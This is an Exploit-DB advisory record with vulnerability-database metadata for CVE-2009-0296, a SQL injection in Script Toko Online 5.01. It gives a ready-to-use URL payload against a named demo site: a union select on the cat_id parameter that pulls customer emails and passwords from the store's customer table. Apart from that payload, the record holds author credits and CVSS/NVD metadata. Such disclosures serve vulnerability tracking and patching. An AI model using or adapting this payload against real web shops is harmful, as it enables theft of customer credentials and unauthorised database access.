ID EDB-ID:7873
Type exploitdb
Reporter k1n9k0ng
Modified 2009-01-26T00:00:00
Description
Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln. CVE-2009-0296. Webapps exploit for php platform
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : Script Toko Online Vs.5.01
Scripts site : http://www.gempar.com/
Discovered By : k1n9k0ng
My Site : http://www.sekuritionline.net
IRC Channel : #sekuritionline
Special To : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://www.gempar.com/demotoko/
Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*
# milw0rm.com [2009-01-26]
{"id": "EDB-ID:7873", "hash": "8a49da8dc230a9a2de23a12a0d56646d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Script Toko Online 5.01 shop_display_products.php SQL Injection Vuln", "description": "Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln. CVE-2009-0296. Webapps exploit for php platform", "published": "2009-01-26T00:00:00", "modified": "2009-01-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7873/", "reporter": "k1n9k0ng", "references": [], "cvelist": ["CVE-2009-0296"], "lastseen": "2016-02-01T03:15:17", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2016-02-01T03:15:17"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0296"]}], "modified": "2016-02-01T03:15:17"}, "vulnersScore": 6.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7873/", "sourceData": "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nScripts : Script Toko Online Vs.5.01\nScripts site : http://www.gempar.com/\nDiscovered By : k1n9k0ng\nMy Site : http://www.sekuritionline.net\nIRC Channel : #sekuritionline\nSpecial To : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nDemo Site :\nhttp://www.gempar.com/demotoko/\n\nBug Found:\nhttp://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*\n\n# milw0rm.com [2009-01-26]\n", "osvdbidlist": ["51630"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in shop_display_products.php in Script Toko Online 5.01 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter.", "modified": "2017-09-29T01:33:00", "id": "CVE-2009-0296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0296", "published": "2009-01-27T20:30:00", "title": "CVE-2009-0296", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
